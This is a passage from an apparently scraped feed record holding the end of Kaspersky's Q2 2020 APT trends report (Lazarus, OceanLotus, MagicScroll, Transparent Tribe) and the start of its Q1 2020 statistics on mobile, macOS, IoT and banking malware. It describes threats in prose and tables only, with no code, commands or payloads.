Before delivering the Windows executable payload, the actor uses two VBS and three PowerShell scripts in order to collect system information. The actor very carefully delivers the final payload only to the intended targets. The backdoor payload also utilizes a multi-stage infection procedure. The actor uses it to control infected hosts and implants additional malware for surveillance. These malicious programs are responsible for stealing the user's keystrokes and saving a screenshot of the infected machine. The main targets of this campaign are financial institutions, such as cryptocurrency businesses, and fintech companies. We identified diverse victims from 10 countries, as well as more potential victims from open source intelligence.\n\nThe Lazarus group has been a major threat actor for several years. Alongside goals like cyber-espionage and cyber-sabotage, this threat actor has targeted banks and other financial companies around the globe. The group continues to be very active. We recently observed the Lazarus group attacking a software vendor in South Korea using Bookcode, malware that we evaluate to be a Manuscrypt variant, utilizing a watering-hole attack to deliver it. Manuscrypt is one of the Lazarus group's tools that is actively being updated and used. The group attacked the same victim twice. Almost a year prior to compromising this victim, Lazarus attempted to infect it by masquerading as a well-known security tool, but failed. We were able to construct the group's post-exploitation activity, identifying various freeware and red-teaming tools used. Although Lazarus has recently tended to focus more on targeting the financial industry, we believe that in this campaign they were seeking to exfiltrate intellectual property. We also observed that they previously spread Bookcode using a decoy document related to a company working in the defense sector. 
Based on our observations, we evaluate that the Bookcode malware is being used exclusively for cyber-espionage campaigns.\n\nIn April, we released an early warning about the VHD ransomware, which was first spotted in late March. This ransomware stood out because of its self-replication method. The use of a spreading utility compiled with victim-specific credentials was reminiscent of APT campaigns, but at the time we were unable to link the attack to an existing group. However, Kaspersky was able to identify an incident in which the VHD ransomware was deployed, in close conjunction with known Lazarus tools, against businesses in France and Asia. This indicates that Lazarus is behind the VHD ransomware campaigns that have been documented so far. As far as we know, this is also the first time it has been established that the Lazarus group has resorted to targeted ransomware attacks for financial gain.\n\nLast year we created a private report on a malware framework that we named MATA, which we attribute, with low confidence, to the Lazarus group. This framework included several components, such as a loader, orchestrator and plug-ins. Initially, this framework targeted Windows and Linux. However, in April we discovered a suspicious macOS file uploaded to VirusTotal using a rule to detect the MATA malware framework. After looking into this malware, we confirmed that it was a macOS variant of the MATA malware. The malware developers Trojanized an open-source two-factor authentication application and utilized another open-source application template. While investigating, to find more solid evidence for attribution, we found an old Manuscrypt strain that used a similar configuration structure. We also discovered a cluster of C2 servers probably related to this campaign.\n\nThe MATA framework was not the only way that Lazarus targeted macOS. 
We also observed a cluster of activity linked to [Operation AppleJeus](<https://securelist.com/operation-applejeus-sequel/95596/>). The other was similar to the macOS malware used in a campaign that we call TangDaiwbo. This is a multi-platform cryptocurrency exchange campaign: Lazarus utilizes macro-embedded Office documents and spreads PowerShell or macOS malware, depending on the victim's system.\n\nEarly this year, we reported improvements in a Lazarus campaign targeting a cryptocurrency business. In this campaign, Lazarus adopted a downloader that sends compromised host information and selectively fetches the next-stage payload. Recently, we identified a Lazarus campaign with similar strategies, but targeting academic and automotive sectors. Lazarus also adopted new methods to deliver its tools. First of all, the group elaborated its weaponized document by adopting remote template injection techniques. Previously, Lazarus delivered macro-embedded documents to the victim, but the group has now applied one more stage to hinder detection. The group also utilized an open-source PDF reader named Sumatra PDF to make Trojanized applications. They created a Trojanized PDF reader, sending it to the victim with a crafted PDF file. If the victim opens this file, the Trojanised PDF viewer implants malicious files and shows decoy documents to deceive the victim. The actor delivers the final payload very carefully, and executes it in memory. Fortunately, we were able to get the final payload and confirm that it was a Manuscrypt variant that we had already described. 
We also found that it's the same malware variant that the US CISA (Cybersecurity and Infrastructure Security Agency) recently reported, named COPPERHEDGE.\n\nFollowing our report describing the long-standing [PhantomLance](<https://securelist.com/apt-phantomlance/96772/>) campaign in Southeast Asia, we published a private report providing detailed attribution based on discovered overlaps with reported campaigns of the OceanLotus APT. In particular, we found multiple code similarities with the previous Android campaign, as well as similarities in macOS backdoors, infrastructure overlap with Windows backdoors and a couple of cross-platform resemblances. Based on our research, we believe, with medium confidence, that PhantomLance is a modern Android campaign conducted by OceanLotus. Apart from the attribution details, we described the actor's spreading strategy using techniques to bypass app market filters. We also provided additional details about samples associated with previously reported suspected infrastructure, as well as the latest sample deployed in 2020 that uses Firebase to decrypt its payload.\n\nAdditionally, OceanLotus has been using new variants of its multi-stage loader since the second half of 2019. The new variants use target-specific information (username, hostname, etc.) of the targeted host that they obtained beforehand, in order to ensure their final implant is deployed on the right victim. The group continues to deploy its backdoor implant, as well as Cobalt Strike Beacon, configuring them with updated infrastructure.\n\n## **Other interesting discoveries**\n\nThe Deceptikons APT is a long-running espionage group believed to have been providing mercenary services for almost a decade now. The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits. The Deceptikons infrastructure and malware set is clever, rather than technically advanced. 
It is also highly persistent and in many ways reminds us of WildNeutron. Deceptikons' repeated targeting of commercial and non-governmental organizations is somewhat unusual for APT actors. In 2019, Deceptikons spear-phished a set of European law firms, deploying PowerShell scripts. As in previous campaigns, the actor used modified LNK files requiring user interaction to initially compromise systems and execute a PowerShell backdoor. In all likelihood, the group's motivations included obtaining specific financial information, details of negotiations, and perhaps even evidence of the law firms' clientele.\n\nMagicScroll (aka AcidBox) is the name we've given to a sophisticated malware framework, whose main purpose is to decrypt and load an arbitrary payload in kernel mode. The framework consists of several stages. The first stage is a Windows security provider that is loaded by the system on boot and executed in user mode. This decrypts and runs a second payload, which is physically stored in the registry. Although we weren't able to find a victim with this second stage, we were able to find a file that matches the expected format of the second stage. This second stage payload utilizes a well-known vulnerability in a VirtualBox driver (CVE-2008-3431) to load the third stage, which is designed to run in kernel mode. The kernel mode payload is decrypted from a resource from the second stage, using the key retrieved from the registry. Unfortunately, we couldn't find a decryption key to decrypt the third stage payload, so we don't know what the last part of this malware framework looks like. Although the code is quite sophisticated, we couldn't identify any similarity with other known frameworks.\n\nAarogya Setu is the name of a mandatory COVID-19 mobile tracking app developed by the National Informatics Centre, an organization that comes under the Ministry of Electronics and Information Technology in India. 
It allows its users to connect to essential health services in India. With cyber criminals and APT actors taking advantage of pandemic-tracking applications to distribute Trojanized mobile apps, we investigated and identified apps that mimic the appearance and behavior of the legitimate Aarogya Setu app while deploying Android RATs. We consider one of these to be a new version of a RAT that we previously reported being used by the Transparent Tribe threat actor.\n\n## **Final thoughts**\n\nThe threat landscape isn't always full of "groundbreaking" events. However, a review of the activities of APT threat actors indicates that there are always interesting developments. Our regular quarterly reviews are intended to highlight these key developments.\n\nHere are the main trends that we've seen in Q2 2020.\n\n * Geo-politics remains an important motive for some APT threat actors, as shown in the activities of MuddyWater, the compromise of the Middle East Eye website and the campaigns of CloudComputating and HoneyMyte groups.\n * As is clear from the activities of Lazarus and BlueNoroff, financial gain is another driver for some threat actors - including the use of ransomware attacks.\n * While Southeast Asia continues to be an active region for APT activities, this quarter we have also observed heavy activity by Chinese-speaking groups, including ShadowPad, HoneyMyte, CactusPete, CloudComputating and SixLittleMonkeys.\n * APT threat actors continue to exploit software vulnerabilities - examples this quarter include Hades and MagicScroll.\n * We have noted before that the use of mobile implants is no longer a novelty, and this quarter is no exception, as illustrated by the PhantomLance campaign.\n * It is clear that APT actors, like opportunistic cybercriminals, continue to exploit the COVID-19 pandemic as a theme to lure potential victims. 
However, we would note once again that this doesn't represent a shift in TTPs.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-07-29T10:00:09", "published": "2020-07-29T10:00:09", "id": "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "href": "https://securelist.com/apt-trends-report-q2-2020/97937/", "type": "securelist", "title": "APT trends report Q2 2020", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-20T11:49:25", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-17026", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729", "CVE-2020-0767", "CVE-2020-0796", "CVE-2020-6418"], "description": "\n\n_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.\n * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.\n * Ransomware attacks were defeated on the computers of 178,922 unique users.\n * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 1,152,662 malicious installation packages\n * 42,115 installation packages for mobile banking trojans\n * 4339 installation packages for mobile ransomware trojans\n\n## Mobile 
threats\n\n### Quarter events\n\nQ1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for \u20ac0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.\n\nAnother interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.\n\nThe third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the chances of their apps getting published and recommended, and to lull the vigilance of potential victims. 
Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.\n\n### Mobile threat statistics\n\nIn Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.\n\n_Number of malicious installation packages detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_\n\nStarting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_\n\nOf all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).\n\nPotentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.\n\nIn third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. 
against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.\n\nIt is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.\n\n### Top 20 mobile malware programs\n\n_Note that these malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.89 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.09 \n3 | DangerousObject.AndroidOS.GenericML | 7.08 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 \n5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 \n6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 \n7 | Trojan.AndroidOS.Handda.san | 2.31 \n8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 \n9 | Trojan.AndroidOS.Necro.a | 2.19 \n10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 \n11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 \n12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 \n13 | Exploit.AndroidOS.Lotoor.be | 1.46 \n14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 \n15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 \n16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 \n18 | Trojan.AndroidOS.Dvmap.a | 1.24 \n19 | Trojan.AndroidOS.Agent.rt | 1.21 \n20 | Trojan.AndroidOS.Vdloader.a | 1.18 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._\n\nFirst place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud 
technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7.08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nIn fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.\n\nTrojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.\n\nSixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. 
Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.\n\nThe verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.\n\nTrojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.\n\n### Geography of mobile threats\n\n \n\n_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile threats**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Iran | 39.56 \n2 | Algeria | 21.44 \n3 | Bangladesh | 18.58 \n4 | Nigeria | 15.58 \n5 | Lebanon | 15.28 \n6 | Tunisia | 14.94 \n7 | Pakistan | 13.99 \n8 | Kuwait | 13.91 \n9 | Indonesia | 13.81 \n10 | Cuba | 13.62 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. 
Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.\n\n### Mobile banking trojans\n\nDuring the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.\n\n_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_\n\n**Top 10 mobile banking trojans**\n\n_ _ | **Verdict** | **%*** \n---|---|--- \n_1_ | Trojan-Banker.AndroidOS.Rotexy.e | 13.11 \n_2_ | Trojan-Banker.AndroidOS.Svpeng.q | 10.25 \n_3_ | Trojan-Banker.AndroidOS.Asacub.snt | 7.64 \n_4_ | Trojan-Banker.AndroidOS.Asacub.ce | 6.31 \n_5_ | Trojan-Banker.AndroidOS.Agent.eq | 5.70 \n_6_ | Trojan-Banker.AndroidOS.Anubis.san | 4.68 \n_7_ | Trojan-Banker.AndroidOS.Agent.ep | 3.65 \n_8_ | Trojan-Banker.AndroidOS.Asacub.a | 3.50 \n_9_ | Trojan-Banker.AndroidOS.Asacub.ar | 3.00 \n_10_ | Trojan-Banker.AndroidOS.Agent.cf | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._\n\nFirst and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).\n\nThird, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. 
The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.\n\n_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile banking trojans**\n\n| Country* | %** \n---|---|--- \n1 | Japan | 0.57 \n2 | Spain | 0.48 \n3 | Italy | 0.26 \n4 | Bolivia | 0.18 \n5 | Russia | 0.17 \n6 | Turkey | 0.13 \n7 | Tajikistan | 0.13 \n8 | Brazil | 0.11 \n9 | Cuba | 0.11 \n10 | China | 0.10 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.\n\nIn second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.\n\nThird place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.\n\nIt is worth saying a bit more about the Cebruser family. 
Its creators were among the first to exploit the coronavirus topic to spread the malware.\n\nWhen it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.\n\nThe malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail \u2014 the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. 
In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.\n\n### Mobile ransomware trojans\n\nIn Q2 2020, we detected **4,339** installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.\n\n_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_\n\n**Top 10 mobile ransomware trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08 \n2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70 \n3 | Trojan-Ransom.AndroidOS.Small.as | 11.41 \n4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88 \n5 | Trojan-Ransom.AndroidOS.Small.as | 7.32 \n6 | Trojan-Ransom.AndroidOS.Small.o | 4.79 \n7 | Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62 \n8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55 \n9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32 \n10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._\n\nOver the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. 
The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.\n\n_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_\n\nTop 10 countries by share of users attacked by mobile ransomware trojans:\n\n| **Country*** | **%**** \n---|---|--- \n1 | USA | 0.26 \n2 | Kazakhstan | 0.25 \n3 | Iran | 0.16 \n4 | China | 0.09 \n5 | Saudi Arabia | 0.08 \n6 | Italy | 0.03 \n7 | Mexico | 0.03 \n8 | Canada | 0.03 \n9 | Indonesia | 0.03 \n10 | Switzerland | 0.03 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nThe leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%).\n\n## Attacks on Apple macOS\n\nIn Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. 
The malware's operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.\n\n### Top 20 threats to macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 19.27 \n2 | AdWare.OSX.Pirrit.j | 10.34 \n3 | AdWare.OSX.Cimpli.k | 6.69 \n4 | AdWare.OSX.Ketin.h | 6.27 \n5 | AdWare.OSX.Pirrit.aa | 5.75 \n6 | AdWare.OSX.Pirrit.o | 5.74 \n7 | AdWare.OSX.Pirrit.x | 5.18 \n8 | AdWare.OSX.Spc.a | 4.56 \n9 | AdWare.OSX.Cimpli.f | 4.25 \n10 | AdWare.OSX.Bnodlero.t | 4.08 \n11 | AdWare.OSX.Bnodlero.x | 3.74 \n12 | Hoax.OSX.SuperClean.gen | 3.71 \n13 | AdWare.OSX.Cimpli.h | 3.37 \n14 | AdWare.OSX.Pirrit.v | 3.30 \n15 | AdWare.OSX.Amc.c | 2.98 \n16 | AdWare.OSX.MacSearch.d | 2.85 \n17 | RiskTool.OSX.Spigot.a | 2.84 \n18 | AdWare.OSX.Pirrit.s | 2.80 \n19 | AdWare.OSX.Ketin.d | 2.76 \n20 | AdWare.OSX.Bnodlero.aq | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked_\n\nThe top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.\n\nInterestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. 
Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.\n\n### Threat geography\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 7.14 \n2 | France | 6.94 \n3 | Italy | 5.94 \n4 | Canada | 5.58 \n5 | USA | 5.49 \n6 | Russia | 5.10 \n7 | India | 4.88 \n8 | Mexico | 4.78 \n9 | Brazil | 4.65 \n10 | Belgium | 4.65 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)_ \n_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%. \n \nSSH | 18.9% \nTelnet | 81.1% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_\n\nIt was a similar situation with control sessions: attackers often controlled infected traps via telnet. 
\n \nSSH | 39.62% \nTelnet | 60.38% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_\n\n### Telnet-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.**\n\nCountry* | **%** \n---|--- \nChina | 13.04 \nEgypt | 11.65 \nBrazil | 11.33 \nVietnam | 7.38 \nTaiwan | 6.18 \nRussia | 4.38 \nIran | 3.96 \nIndia | 3.14 \nTurkey | 3.00 \nUSA | 2.57 \n \n_ _ \nFor several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).\n\n### SSH-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.**\n\nCountry* | % \n---|--- \nChina | 14.87 \nVietnam | 11.58 \nUSA | 7.03 \nEgypt | 6.82 \nBrazil | 5.79 \nRussia | 4.66 \nIndia | 4.16 \nGermany | 3.64 \nThailand | 3.44 \nFrance | 2.83 \n \nIn Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.\n\n### Threats loaded into honeypots\n\n**Verdict** | %* \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 64.35 \nBackdoor.Linux.Mirai.b | 16.75 \nBackdoor.Linux.Mirai.ba | 6.47 \nBackdoor.Linux.Gafgyt.a | 4.36 \nBackdoor.Linux.Gafgyt.bj | 1.30 \nTrojan-Downloader.Shell.Agent.p | 0.68 \nBackdoor.Linux.Mirai.c | 0.64 \nBackdoor.Linux.Hajime.b | 0.46 \nBackdoor.Linux.Mirai.h | 0.40 
\nBackdoor.Linux.Gafgyt.av | 0.35 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nIn Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.\n\n_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_\n\n**Attack geography**\n\nTo assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Uzbekistan | 10.5 \n2 | Tajikistan | 6.9 \n3 | Turkmenistan | 5.5 \n4 | Afghanistan | 5.1 \n5 | Yemen | 3.1 \n6 | Kazakhstan | 3.0 \n7 | Guatemala | 2.8 \n8 | Syria | 2.4 \n9 | Sudan | 2.1 \n10 | Kyrgyzstan | 2.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a 
